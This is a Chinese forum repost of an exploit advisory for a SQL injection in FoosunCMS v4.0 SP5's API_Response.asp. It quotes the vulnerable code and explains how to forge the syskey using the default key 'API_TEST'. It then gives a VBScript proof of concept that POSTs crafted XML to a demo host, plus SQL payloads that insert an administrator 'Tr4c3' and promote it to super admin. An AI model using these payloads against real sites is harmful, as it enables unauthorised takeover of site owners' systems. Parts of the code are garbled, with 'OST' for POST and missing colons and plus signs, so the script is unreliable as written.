• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    FoosunCMS Sql Injection Vulnerability

    发布者: 酸菜鱼 | 发布时间: 2025-6-28 22:59| 查看数: 49| 评论数: 0|帖子模式

    --== =================== www.nspcn.org ================= ==--
    --==  FoosunCMS (API_Response.asp) Remote SQL Injection Exploit  ==--
    --== =================================================== ==--

    #Author: Tr4c3[at]126[dot]com
    #版权所有: http://www.nspcn.org & [BK瞬间群]
    #漏洞文件 API/API_Response.asp
    #影响版本:v4.0 Sp5[其他版本未看]

    #漏洞原因:
    变量username未经过滤传值,带入sql执行,导致注入产生。
    #关键代码:

    If CheckPost() Then
    Select Case Act
    Case "checkname" 触发注入
    Checkname()

    CheckPost()函数原型在行73-96,username由此获取值,代码如下:

    XmlDoc.documentElement.selectSingleNode("username")

    Checkname()函数在行233-254,代码如下:

    Sub Checkname()
    Dim UserEmail
    Dim Temp_tr,i,Rs,Sql
    UserEmail = Trim(XmlDoc.documentElement.selectSingleNode("email").text)
    If Messenge<>"" Then
    输出错误信息
    Status = 1
    Exit Sub
    End If
    Sql="select UserName,Email From FS_ME_Users where UserName = "& UserName &"" 在此带入sql执行
    Set Rs = User_Conn.Execute(Sql)
    If Not Rs.Eof And Not Rs.Bof Then
    Messenge = "您填写的用户名已经被注册。"
    Status = 1
    Exit Sub
    Else
    Status = 0
    Messenge = "验证通过。"
    End If
    Rs.Close
    Set Rs = Nothing
    End Sub

    利用的关键在于让CheckPost()为真,代码如下:

    Dim NewMd5,OldMd5
    NewMd5 = Md5(UserName&API_SysKey,16) Const API_SysKey = "API_TEST"
    OldMd5 = Md5(UserName&API_SysKey,16)

    If Syskey=NewMd5 or Syskey=OldMd5 Then
    CheckPost = True
    Else
    Status = 1
    Messenge = Messenge & "<li>请求数据验证不通过,请与管理员联系。"
    End If

    API_SysKey在Api_Config.asp里16行被设置

    Const API_SysKey = "API_TEST"

    把注入语句 & API_SysKey 进行一次md5加密之后的16位hash,赋值给syskey就可以了。
    ###Poc:

    Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    Rem 风讯4.0 sp5[mssql] 注入漏洞测试脚本 By Tr4c3[at]126[dot]com
    Rem 更多信息请关注:
    Rem 网安阵线 http//www.nspcn.org/
    Rem web安全手册 http//www.tr4c3.com/
    Rem BK瞬间[qq群]
    Rem 转载请保留以上版权
    Dim strData, strUrl, strGetinfo, xPost
    strData = "<body><userip>999.999.999.999</userip><email>body@baidu.com</email><action>checkname</action><syskey>b77c8e0d7a0784d5</syskey><appid>FoosunCMS</appid><username></username></body>"
    strUrl = "http//demo.foosun.net/api/API_Response.asp"
    Set xPost = CreateObject("Microsoft.XMLHTTP")
    xPost.Open "OST", strUrl, False
    xPost.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    xPost.SetRequestHeader "Referer", strUrl
    xPost.send(strData)
    strGetinfo = xPost.ResponseText
    strGetinfo = bytes2BSTR(xPost.ResponseBody)
    Wscript.echo(strGetinfo)
    Wscript.Quit
    Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

    Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    Rem 将返回内容转换成简体中文
    Function bytes2BSTR(vIn)
    strReturn = ""
    For i = 1 To LenB(vIn)
    ThisCharCode = AscB(MidB(vIn,i,1))
    If ThisCharCode < &H80 Then
    strReturn = strReturn & Chr(ThisCharCode)
    Else
    NextCharCode = AscB(MidB(vIn,i 1,1))
    strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100   CInt(NextCharCode))
    i = i   1
    End If
    Next
    bytes2BSTR = strReturn
    End Function
    Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

    Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    Rem ;insert into FS_MF_Admin (Admin_Name,Admin_Pass_Word)values(Tr4c3,83aa400af464c76d)-- 添加一个普通管理员Tr4c3,密码12345678
    Rem ;update FS_MF_Admin set Admin_Is_Super=1 where Admin_Name=Tr4c3-- 把Tr4c3提升为超级管理员
    Rem -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

    来源:https://www.jb51.net/hack/5462.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表